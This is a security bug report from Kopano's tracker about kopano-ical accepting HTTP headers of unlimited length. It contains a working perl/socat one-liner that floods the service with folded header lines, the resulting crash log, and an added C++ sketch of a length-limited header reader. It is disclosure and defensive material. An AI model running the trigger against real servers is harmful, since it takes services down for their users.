  1. Kopano Groupware Core
  2. KC-1973

ical: HTTP headers don't have a length restriction


    Details

    • Type: Bug
    • Status: Closed
    • Priority: Highest
    • Resolution: Done
    • Affects Version/s: None
    • Fix Version/s: 8.7.20
    • Component/s: kopano-ical
    • Security Level: Public
    • Labels:
      None
    • Environment:
      kopano-core 8.7.19

      Description

      https://www.openwall.com/lists/oss-security/2021/03/19/6

      The "kopano-ical" program implements a network service/trivial HTTP server. It imposes no length restrictions on HTTP headers, which can be exploited to memory-exhaust the process and have it terminate.

      # Trigger
      
      »
        perl -e 'print "GET / HTTP/1.0\nHost: \n"; 
                 while(1) { print " " . "A" x 65000 . "\n"; }' |
        socat - tcp-connect:kopano-ical.example.com:8080
      
      The exact port depends on configuration; 8000 is also a typical choice.
      
      » systemctl status kopano-ical
      ● kopano-ical.service - Kopano Groupware Core iCal/CalDAV Gateway
         Loaded: loaded (/usr/lib/systemd/system/kopano-ical.service; enabled; vendor preset: disabled)
         Active: failed (Result: signal) since Fri 2021-03-19 13:24:26 CET; 32s ago
           Docs: man:kopano-ical(8)
                 man:kopano-ical.cfg(5)
        Process: 2126 ExecStart=/usr/sbin/kopano-ical -F (code=killed, signal=ABRT)
       Main PID: 2126 (code=killed, signal=ABRT)
      
      kopano-ical[2126]: terminate called after throwing an instance of 'std::bad_alloc'
      kopano-ical[2126]: ----------------------------------------------------------------------
      kopano-ical[2126]: Fatal error detected. Please report all following information.
      kopano-ical[2126]: kopano-ical 8.7.16.0
      kopano-ical[2126]:   what():  std::bad_alloc
      systemd[1]: kopano-ical.service: Main process exited, code=killed, status=6/ABRT
      systemd[1]: kopano-ical.service: Unit entered failed state.
      systemd[1]: kopano-ical.service: Failed with result 'signal'.
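
The missing restriction described above, sketched as an added example (not Kopano's code and not the fix shipped in 8.7.20): a header reader that bounds both a single line and the whole header block, so folded continuation lines like those in the trigger cannot grow one header without limit. The class name, status names and both limits are assumptions made for this illustration.

```cpp
#include <cstddef>
#include <string>
#include <utility>
#include <vector>

// Assumed limits for this example; not values taken from kopano-ical.
constexpr std::size_t MAX_LINE_BYTES = 8192;     // one physical line
constexpr std::size_t MAX_HEADER_BYTES = 65536;  // request line + all headers

enum class HdrStatus { need_more, complete, too_large, malformed };

class BoundedHeaderReader {
public:
    // Feed bytes as they arrive from the socket. Any status other than
    // need_more is final; the caller should then answer (e.g. 431) and close.
    HdrStatus feed(const std::string &chunk) {
        for (char c : chunk) {
            if (m_status != HdrStatus::need_more)
                break;
            // Count every byte, so folded continuation lines cannot grow
            // one header past the total budget.
            if (++m_total > MAX_HEADER_BYTES) { m_status = HdrStatus::too_large; break; }
            if (c != '\n') {
                // Also bound a line that never ends.
                if (m_line.size() >= MAX_LINE_BYTES) { m_status = HdrStatus::too_large; break; }
                m_line.push_back(c);
                continue;
            }
            if (!m_line.empty() && m_line.back() == '\r')
                m_line.pop_back();
            if (m_line.empty()) { m_status = HdrStatus::complete; break; }
            bool fold = m_line[0] == ' ' || m_line[0] == '\t';
            if (!fold)
                m_lines.push_back(std::move(m_line));
            else if (m_lines.size() >= 2)
                m_lines.back() += m_line;         // continuation of previous header
            else
                m_status = HdrStatus::malformed;  // fold with no header before it
            m_line.clear();
        }
        return m_status;
    }
    // lines()[0] is the request line, the rest are unfolded headers.
    const std::vector<std::string> &lines() const { return m_lines; }

private:
    std::string m_line;
    std::vector<std::string> m_lines;
    std::size_t m_total = 0;
    HdrStatus m_status = HdrStatus::need_more;
};
```

Because the total is checked before a byte is stored, the memory held per connection stays below `MAX_HEADER_BYTES` regardless of how the input is split into lines or chunks.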
      

              People

              Assignee: Unassigned
              Reporter: Joost Hopmans (jhopmans)